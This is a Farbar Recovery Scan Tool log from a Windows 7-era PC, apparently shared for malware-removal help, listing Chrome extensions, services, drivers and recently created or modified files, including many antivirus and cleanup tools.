CHR Plugin: (Windows Presentation Foundation) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (Picasa) - q:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (npQQPhotoDrawEx) - q:\Program Files\Tencent\Qzone\npQQPhotoDrawEx.dll ()
CHR Plugin: (QvodInsert) - q:\QvodPlayer\npQvodInsert.dll No File
CHR Plugin: (Default Plug-in) - default_plugin No File
CHR CustomProfile: C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (有道词典Chrome鼠标取词插件) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohddidmgooofkgohkbkaohadkolgejj [2011-12-15]
CHR Extension: (Socialyst) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\dijfedceenikakhbnmjblkajfidedfjd [2012-06-23]
CHR Extension: (Daum Equation Editor) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\dinfmiceliiomokeofbocegmacmagjhe [2012-07-09]
CHR Extension: (ZenMate) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2014-09-08]
CHR Extension: (AdBlock) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2013-11-10]
CHR Extension: (Thunder Download Extension for Chrome) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmbifdmobcbjlhplmlnbjbofnnoolink [2012-09-10]
CHR Extension: (Songstr - Search music everywhere) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\jcnkffbppdcibidkcjfgindlmekhaoep [2012-07-09]
CHR Extension: (Google 电子钱包) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-30]
CHR Extension: (单词圣手(Smart Word)) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\odhiddefamddbjhpaoagfkmgkkfhjnkd [2012-07-09]
CHR Extension: (Unblock Youku) - C:\Users\THINK\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdnfnkhpgegpcingjbfihlkjeighnddk [2014-06-05]
CHR HKLM\...\Chrome\Extension: [aohddidmgooofkgohkbkaohadkolgejj] - Q:\Program Files\Youdao\Dict4\YDChromeTextExtractor.crx [2011-08-28]
CHR HKLM\...\Chrome\Extension: [hmbifdmobcbjlhplmlnbjbofnnoolink] - Q:\Program Files\Thunder Network\Thunder\BHO\xl_plugin_chrome.crx [2013-12-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 360rp; Q:\Program Files\360\360sd\360rps.exe [251208 2014-05-27] (360.cn)
S4 ADMonitor; C:\Windows\system32\ADMonitor.exe [106496 2009-03-18] () [File not signed]
S3 Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [68096 2009-09-13] () [File not signed]
S3 AdvancedSystemCareService7; Q:\Program Files\IObit\Advanced SystemCare 7\ASCService.exe [881952 2014-01-14] (IObit)
S2 AntiVirMailService; C:\Program Files\Avira\AntiVir Desktop\avmailc.exe [802384 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files\Avira\AntiVir Desktop\sched.exe [430160 2014-07-23] (Avira Operations GmbH & Co. KG)
S2 AntiVirService; C:\Program Files\Avira\AntiVir Desktop\avguard.exe [430160 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 AntiVirWebService; C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE [1021008 2014-07-23] (Avira Operations GmbH & Co. KG)
R2 Conew Rescue Service; q:\Program Files\Keniu\ConewRsc\conewrsc.exe [140696 2010-10-20] ()
S4 DGPNPSEV; q:\Program Files\MyDrivers\DriverGenius2012\DgService.exe [52664 2012-08-16] (MyDrivers.com)
S2 dtsvc; C:\Windows\system32\DTS.exe [98304 2009-03-18] () [File not signed]
S4 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [72992 2014-07-07] (Hewlett-Packard Company)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
S3 ImeDictUpdateServiceWR; C:\Program Files\Common Files\Microsoft Shared\IME14WR\SHARED\IMEDICTUPDATE.EXE [60208 2010-02-01] (Microsoft Corporation)
R2 IMFservice; C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe [342336 2014-05-15] (IObit)
S2 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [2152736 2014-05-04] (IObit)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S4 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 NitroReaderDriverReadSpool; C:\Program Files\Nitro PDF\Reader\NitroPDFReaderDriverService.exe [196912 2011-01-14] (Nitro PDF Software)
R2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [2398536 2011-01-12] (O&O Software GmbH)
R2 Pharos Systems ComTaskMaster; C:\Program Files\PharosSystems\Core\CTskMstr.exe [345600 2009-12-08] (Pharos Systems International) [File not signed]
S4 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [66872 2009-10-05] ()
S3 ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [657408 2009-10-26] (Nokia) [File not signed]
S3 SUService; C:\Program Files\Lenovo\System Update\SUService.exe [28672 2009-06-11] (Lenovo Group Limited) [File not signed]
R2 TSSCoreService; C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe [779576 2008-06-13] (Lenovo)
R2 TVT Backup Protection Service; C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe [1118208 2010-12-10] () [File not signed]
R2 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1425408 2010-12-10] (Lenovo Group Limited) [File not signed]
R2 TVT Scheduler; c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe [1171456 2010-12-10] (Lenovo Group Limited) [File not signed]
S4 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2058776 2008-05-29] (Intel Corporation)
S3 XLServicePlatform; C:\Program Files\Common Files\Thunder Network\ServicePlatform\XLSP.dll [174024 2013-12-29] (深圳市迅雷网络技术有限公司)
S3 PPTVService; C:\windows\system32\PPTVSvc.dll [X]
S3 RoxMediaDB10; "C:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 360AvFlt; C:\windows\System32\DRIVERS\360AvFlt.sys [65608 2014-04-22] (360.cn)
R3 Afc; C:\windows\System32\drivers\Afc.sys [18688 2006-11-10] (Arcsoft, Inc.)
S3 Alidevice; C:\windows\system32\Drivers\Alidevice.sys [6656 2010-07-01] (alipay.com) [File not signed]
R2 avgntflt; C:\windows\System32\DRIVERS\avgntflt.sys [97648 2014-07-14] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\windows\System32\DRIVERS\avipbb.sys [136216 2014-06-03] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\windows\System32\DRIVERS\avkmgr.sys [37352 2013-12-12] (Avira Operations GmbH & Co. KG)
R1 BAPIDRV; C:\windows\System32\DRIVERS\BAPIDRV.sys [165960 2014-06-12] (360.cn)
R0 BC; C:\windows\System32\Drivers\BC.sys [24472 2010-10-21] (Kingsoft Corporation)
R3 Btcsrusb; C:\windows\System32\Drivers\btcusb.sys [36616 2010-06-24] (IVT Corporation.)
S3 bthav; C:\windows\System32\drivers\bthav.sys [34816 2008-07-10] (CSR, plc)
R1 DVDHelp; C:\windows\System32\drivers\DVDHelp.sys [25624 2011-02-04] ()
S4 FileMonitor; C:\Program Files\IObit\IObit Malware Fighter\Drivers\wlh_x86\FileMonitor.sys [21480 2013-03-23] (IObit)
R3 intelkmd; C:\windows\System32\DRIVERS\igdpmd32.sys [4747776 2009-12-10] (Intel Corporation)
S3 krpr; C:\windows\system32\Drivers\krpr.sys [48536 2010-10-21] (Kingsoft Corporation)
S3 ksaud; C:\windows\System32\drivers\ksaud.sys [1230976 2010-04-08] (Creative Technology Ltd.)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-15] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-05-12] (Malwarebytes Corporation)
S3 Ndisrd; C:\windows\System32\DRIVERS\ndisrd.sys [22016 2011-04-30] (NT Kernel Resources)
R3 NdisrdMP; C:\windows\System32\DRIVERS\ndisrd.sys [22016 2011-04-30] (NT Kernel Resources)
R3 NETwNv32; C:\windows\System32\DRIVERS\NETwNv32.sys [7341568 2011-08-03] (Intel Corporation)
S3 p2pfilter; Q:\Program Files\p2pover\p2pfilter.sys [4524 2005-05-10] () [File not signed]
S3 PCASp50; C:\windows\System32\Drivers\PCASp50.sys [35256 2009-12-24] (Printing Communications Assoc., Inc. (PCAUSA))
R1 ProtectorA; C:\windows\System32\drivers\ProtectorA.sys [15240 2009-11-26] (www.ISRA.org.cn)
R1 QQProtect; C:\windows\system32\drivers\QQProtect.sys [215096 2014-05-05] (Tencent)
R3 rasuw; C:\windows\System32\DRIVERS\rasuw.sys [33280 2009-10-12] (The UW Driver Project) [File not signed]
R3 RegFilter; C:\Program Files\IObit\IObit Malware Fighter\drivers\wlh_x86\regfilter.sys [32288 2013-11-19] (IObit.com)
R2 risdptsk; C:\windows\System32\DRIVERS\risdptsk.sys [46592 2009-09-22] (REDC) [File not signed]
R3 SNP2UVC; C:\windows\System32\DRIVERS\snp2uvc.sys [1754368 2008-11-25] ()
R0 sptd; C:\windows\System32\Drivers\sptd.sys [691696 2013-08-08] () [File not signed]
R1 ssmdrv; C:\windows\System32\DRIVERS\ssmdrv.sys [28520 2012-12-15] (Avira GmbH)
R1 Su1xDriver; C:\Windows\system32\DRIVERS\Su1xDriver.sys [6144 2009-12-14] (Ruijie) [File not signed]
R1 TPPWRIF; C:\windows\System32\drivers\Tppwr32v.sys [12080 2008-07-28] ()
S3 Tq_91Assistant; Q:\Program Files\NetDragon\91 Mobile\iPhone\Tq_91Assistant.sys [15784 2012-09-19] ()
R2 tvtfilter; C:\windows\System32\DRIVERS\tvtfilter.sys [33536 2012-02-26] (Lenovo) [File not signed]
S3 UrlFilter; C:\Program Files\IObit\IObit Malware Fighter\drivers\wlh_x86\UrlFilter.sys [20944 2013-11-19] (IObit.com)
S3 USBAAPL; C:\windows\System32\Drivers\usbaapl.sys [43520 2012-04-25] (Apple, Inc.) [File not signed]
R2 YLMFVDISK; C:\windows\System32\drivers\VirtDisk.sys [23768 2011-12-09] ()
R2 {1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC}; q:\Program Files\CyberLink\PowerDVD10\PowerDVD10\NavFilter\000.fcl [87536 2010-03-13] (CyberLink Corp.)
U3 appbss9f; C:\windows\system32\Drivers\appbss9f.sys [0 ] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 massfilter; system32\drivers\massfilter.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S1 Packet; system32\DRIVERS\ProtoDrv.sys [X]
S3 Passthru; system32\DRIVERS\Immunity.sys [X]
S3 PcdrNdisuio; system32\DRIVERS\pcdrndisuio.sys [X]
S3 TcHardWare; \??\C:\Program Files\Tencent\QQPCMgr\5.2.1511.201\QQPCHW.sys [X]
S3 tcphoc; \??\Q:\Program Files\Thunder Network\Thunder\XLDoctor\7.2.0.3062_5\Program\tcphoc.sys [X]
S3 xAntiArp; system32\DRIVERS\xAntiArp.sys [X]
S3 zgdccat; system32\DRIVERS\zgdccat.sys [X]
S3 zgdccdiag; system32\DRIVERS\zgdccdiag.sys [X]
S3 zgdccmdm; system32\DRIVERS\zgdccmdm.sys [X]
S3 zgdccnmea; system32\DRIVERS\zgdccnmea.sys [X]
S3 zgdccvousb; system32\DRIVERS\zgdccvousb.sys [X]
U3 atytwtun; No ImagePath
U3 mbr; \??\C:\Users\THINK\AppData\Local\Temp\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 17:13 - 2014-09-15 17:14 - 00035813 _____ () C:\Users\THINK\Desktop\FRST.txt
2014-09-15 17:13 - 2014-09-15 17:13 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST (1).exe
2014-09-15 13:36 - 2014-09-15 13:36 - 00688992 ____R (Swearware) C:\Users\THINK\Desktop\dds.com
2014-09-15 12:12 - 2014-09-15 12:16 - 00002514 _____ () C:\Users\THINK\Desktop\Rkill.txt
2014-09-15 12:12 - 2014-09-15 12:12 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\THINK\Desktop\rkill.exe
2014-09-15 00:29 - 2014-09-15 00:29 - 00000000 ____D () C:\Program Files\ESET
2014-09-15 00:28 - 2014-09-15 00:28 - 02347384 _____ (ESET) C:\Users\THINK\Desktop\esetsmartinstaller_enu.exe
2014-09-15 00:01 - 2014-09-15 00:01 - 00000532 _____ () C:\windows\PFRO.log
2014-09-14 23:27 - 2014-09-14 23:28 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2015
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2014
2014-09-14 23:24 - 2014-09-14 23:25 - 04927216 _____ (AVG Technologies) C:\Users\THINK\Desktop\avg_free_stb_all_2014_4765.exe
2014-09-14 22:55 - 2014-05-18 08:00 - 00000000 ____D () C:\Users\THINK\Desktop\[140521]TVアニメ「一週間フレンズ。」EDテーマ「奏 (かなで)」/藤宮香織(CV.雨宮天)[320K+BK]
2014-09-14 22:20 - 2014-09-14 22:20 - 00000976 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 22:20 - 2014-09-14 22:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 22:02 - 2014-09-14 22:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\木马清除专家 2014
2014-09-14 22:00 - 2014-09-14 22:01 - 13221712 _____ () C:\Users\THINK\Desktop\avt_setup.exe
2014-09-14 19:59 - 2014-09-14 19:59 - 00000049 _____ () C:\Users\THINK\AppData\Roaming\pk.ini
2014-09-14 19:59 - 2014-09-14 19:59 - 00000000 ____D () C:\Users\THINK\Desktop\顽固木马克星
2014-09-14 19:55 - 2014-09-14 19:56 - 04838816 _____ () C:\Users\THINK\Desktop\TrojanKill.exe
2014-09-14 19:52 - 2014-09-14 19:59 - 24403519 _____ () C:\Users\THINK\Desktop\360compkill5.1.0.1102-0905.zip
2014-09-14 17:20 - 2014-09-15 16:55 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 17:19 - 2014-09-14 17:19 - 00000909 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-14 17:19 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-14 16:29 - 2014-09-14 16:29 - 00041256 _____ () C:\ComboFix.txt
2014-09-14 12:59 - 2011-06-26 02:45 - 00256000 _____ () C:\windows\PEV.exe
2014-09-14 12:59 - 2010-11-07 13:20 - 00208896 _____ () C:\windows\MBR.exe
2014-09-14 12:59 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00098816 _____ () C:\windows\sed.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00080412 _____ () C:\windows\grep.exe
2014-09-14 12:59 - 2000-08-30 20:00 - 00068096 _____ () C:\windows\zip.exe
2014-09-14 12:57 - 2014-09-14 16:30 - 00000000 ____D () C:\Qoobox
2014-09-14 12:57 - 2014-09-14 16:28 - 00000000 ____D () C:\windows\erdnt
2014-09-14 12:55 - 2014-09-14 12:55 - 05578360 ____R (Swearware) C:\Users\THINK\Desktop\ComboFix.exe
2014-09-14 12:49 - 2014-09-15 17:13 - 00000000 ____D () C:\FRST
2014-09-14 12:48 - 2014-09-14 12:48 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST.exe
2014-09-14 12:25 - 2014-09-14 12:25 - 30856384 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\Windows-KB890830-V5.16.exe
2014-09-14 12:24 - 2014-09-14 12:28 - 117624056 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\msert.exe
2014-09-14 01:20 - 2014-09-14 01:20 - 00000000 ____D () C:\ProgramData\ksrbm
2014-09-13 23:58 - 2010-10-21 14:23 - 00048536 _____ (Kingsoft Corporation) C:\windows\system32\Drivers\krpr.sys
2014-09-13 23:57 - 2014-09-13 23:57 - 00000662 _____ () C:\Users\Public\Desktop\可牛急救箱.lnk
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\Users\THINK\Desktop\可牛系统急救箱
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\可牛急救箱
2014-09-13 23:41 - 2014-09-13 23:42 - 00928768 _____ () C:\Users\THINK\Desktop\可牛系统急救箱_@106316@.exe
2014-09-13 22:54 - 2014-09-13 22:55 - 16578402 _____ ( ) C:\Users\THINK\Desktop\DLLSuite_Setup.exe
2014-09-12 19:10 - 2014-09-14 16:45 - 00000000 __SHD () C:\Users\THINK\AppData\Roaming\360Quarant
2014-09-12 19:05 - 2014-07-02 12:07 - 00358984 _____ (360.cn) C:\windows\system32\Drivers\Kemon.sys
2014-09-11 23:02 - 2014-09-11 23:04 - 00711168 _____ () C:\Users\THINK\Desktop\第七章_半导体的表面.ppt
2014-09-11 00:14 - 2014-09-11 00:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\墿崹僼儘儞僥傿傾
2014-09-10 23:45 - 2014-09-10 23:45 - 00000000 ____D () C:\Users\Public\SogouInput
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\搜狗拼音输入法
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 _____ () C:\windows\system32\nsyF3B8.tmp
2014-09-10 02:04 - 2014-09-10 02:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Foxit Software
2014-09-08 14:32 - 2014-09-08 14:32 - 00000000 ____D () C:\ProgramData\LocalStorage
2014-09-08 14:29 - 2014-09-13 23:51 - 00000000 ____D () C:\Users\THINK\Documents\QiyiVideoLibrary
2014-09-08 14:29 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 14:28 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\Public\QiYi
2014-09-06 21:40 - 2014-09-06 21:40 - 00000000 ____D () C:\Users\THINK\Desktop\小毛
2014-09-06 19:55 - 2014-09-06 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Local\thunder network
2014-09-01 06:33 - 2014-09-01 06:33 - 00016393 _____ () C:\windows\system32\hs_err_pid7548.log
2014-08-29 11:02 - 2014-08-29 11:02 - 00258932 _____ () C:\Users\THINK\Desktop\rephotos32ericson.zip
2014-08-26 21:49 - 2014-08-26 21:49 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 02263552 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 01993728 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00638400 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgkrnl.sys
2014-08-26 21:48 - 2014-08-26 21:48 - 00332800 _____ (Microsoft Corporation) C:\windows\system32\msihnd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\consent.exe
2014-08-26 21:48 - 2014-08-26 21:48 - 00037376 _____ (Microsoft Corporation) C:\windows\system32\cdd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00033280 _____ (Microsoft Corporation) C:\windows\system32\appinfo.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 12356608 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 09739264 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 02382848 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-08-26 21:44 - 2014-08-26 21:44 - 01129472 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00353792 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00223232 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00073216 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00041472 _____ (Microsoft Corporation) C:\windows\system32\msfeedsbs.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00011776 _____ (Microsoft Corporation) C:\windows\system32\mshta.exe
2014-08-26 21:44 - 2014-08-26 21:44 - 00010752 _____ (Microsoft Corporation) C:\windows\system32\msfeedssync.exe
2014-08-26 21:43 - 2014-08-26 21:43 - 01810432 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01802240 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01427968 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-08-26 21:43 - 2014-08-26 21:43 - 01137664 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00717824 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00421376 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00273408 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-08-26 21:43 - 2014-08-26 21:43 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\url.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00142848 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-08-26 21:42 - 2014-08-26 21:42 - 02051072 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-08-26 21:42 - 2014-08-26 21:42 - 01401344 _____ (Microsoft Corporation) C:\windows\system32\msxml6.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 01248768 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 00506880 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00915392 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-08-26 21:41 - 2014-08-26 21:41 - 00502784 _____ (Microsoft Corporation) C:\windows\system32\usp10.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpipreg.sys
2014-08-26 21:40 - 2014-08-26 21:40 - 11587584 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00876032 _____ (Microsoft Corporation) C:\windows\system32\wer.dll
2014-08-24 16:49 - 2014-08-24 16:49 - 00430080 _____ () C:\Users\THINK\Desktop\7-6空间直线及其方程.ppt
2014-08-24 12:43 - 2014-08-25 10:38 - 00000000 ____D () C:\Users\THINK\Desktop\dudley
2014-08-24 10:48 - 2014-08-24 10:48 - 00000000 ____D () C:\$360Section
2014-08-19 01:50 - 2014-08-19 01:50 - 03695208 _____ (Sogou.com Inc.) C:\windows\system32\SogouPY.ime
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 17:14 - 2014-09-15 17:13 - 00035813 _____ () C:\Users\THINK\Desktop\FRST.txt
2014-09-15 17:13 - 2014-09-15 17:13 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST (1).exe
2014-09-15 17:13 - 2014-09-14 12:49 - 00000000 ____D () C:\FRST
2014-09-15 17:10 - 2011-04-03 20:26 - 00000000 ____D () C:\Users\THINK\AppData\Local\Last.fm
2014-09-15 16:56 - 2011-02-04 07:53 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\迅雷软件
2014-09-15 16:55 - 2014-09-14 17:20 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-15 16:04 - 2006-11-02 08:47 - 00003744 _____ () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:04 - 2006-11-02 08:47 - 00003744 _____ () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 14:55 - 2013-05-30 16:35 - 00000000 ____D () C:\Users\THINK\Desktop\der
2014-09-15 13:36 - 2014-09-15 13:36 - 00688992 ____R (Swearware) C:\Users\THINK\Desktop\dds.com
2014-09-15 12:16 - 2014-09-15 12:12 - 00002514 _____ () C:\Users\THINK\Desktop\Rkill.txt
2014-09-15 12:12 - 2014-09-15 12:12 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\THINK\Desktop\rkill.exe
2014-09-15 12:05 - 2014-07-20 20:56 - 00769409 _____ () C:\windows\WindowsUpdate.log
2014-09-15 11:21 - 2010-04-04 06:52 - 00000000 ____D () C:\Program Files\Everything
2014-09-15 11:09 - 2009-10-01 03:38 - 00000000 ____D () C:\Users\Public\Thunder Network
2014-09-15 09:55 - 2011-10-01 10:30 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\renren.com
2014-09-15 00:29 - 2014-09-15 00:29 - 00000000 ____D () C:\Program Files\ESET
2014-09-15 00:28 - 2014-09-15 00:28 - 02347384 _____ (ESET) C:\Users\THINK\Desktop\esetsmartinstaller_enu.exe
2014-09-15 00:04 - 2014-07-21 19:56 - 00000000 ____D () C:\ProgramData\ProductData
2014-09-15 00:02 - 2006-11-02 09:01 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-15 00:01 - 2014-09-15 00:01 - 00000532 _____ () C:\windows\PFRO.log
2014-09-15 00:01 - 2010-10-04 07:35 - 02717216 _____ () C:\windows\system32\OODBS.lor
2014-09-14 23:28 - 2014-09-14 23:27 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\MFAData
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2015
2014-09-14 23:27 - 2014-09-14 23:27 - 00000000 ____D () C:\Users\THINK\AppData\Local\Avg2014
